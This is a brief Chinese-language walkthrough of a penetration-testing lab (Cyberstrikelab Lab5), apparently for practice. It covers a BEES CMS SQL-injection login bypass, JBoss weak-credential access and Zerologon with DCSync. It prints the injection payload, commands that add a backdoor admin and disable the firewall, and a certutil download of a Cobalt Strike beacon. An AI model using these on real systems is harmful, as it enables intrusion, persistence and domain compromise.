跳过正文

Cyberstrikelab-Lab5

·58 字·1 分钟
Cyberstrikelab CMS JBOSS Zerologon PTH
HYH
作者
HYH
一名专注于网络安全、渗透测试与 CTF 挑战的技术爱好者,热衷于记录实战经验、分享工具与技术,致力于持续学习与成长。
目录

BEES CMS
#

fscan扫描到6582端口

经过搜索发现后台登录的用户名处存在SQL注入
通过联合注入伪造登录

user=-1'+uniselecton+selselectect+1,'admin','e10adc3949ba59abbe56e057f20f883e',0,0+%23&password=123456&code=dd18&submit=true&submit.x=0&submit.y=0

在后台进行上传文件

连接成功,在根目录拿到flag1
上线cs,开启RDP,添加后门用户

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
net user hack Admin@123 /add
net localgroup Administrators hack /add
netsh firewall set opmode disable

JBOSS
#

还存在一个192.168.20.10段

其中192.168.20.20开放了8080端口运行jboss
弱密码可以登录到后台:admin/admin
拿小黑的工具进行扫描
直接就是system权限
直接读flag2
下载定向木马,上线cs

certutil -urlcache -split -f http://192.168.20.10:6582/beacon_x64.exe beacon.exe

rdp的话有点问题,这里直接走winrm吧

Zerologon
#

还是检查到了zerologon

重置密码
走DCsync拿到哈希
最后拿到flag3

Reply by Email